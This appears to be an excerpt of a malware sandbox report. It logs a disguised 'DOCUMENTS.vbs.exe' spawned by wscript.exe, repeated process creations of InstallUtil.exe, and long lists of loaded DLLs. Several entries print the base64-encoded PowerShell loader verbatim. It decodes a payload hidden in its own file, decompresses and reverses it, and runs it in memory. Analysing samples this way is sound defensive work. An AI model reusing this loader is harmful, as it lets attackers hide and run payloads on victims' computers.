Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\DOCUMENTS.vbs.exe "C:\Users\user\Desktop\DOCUMENTS.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
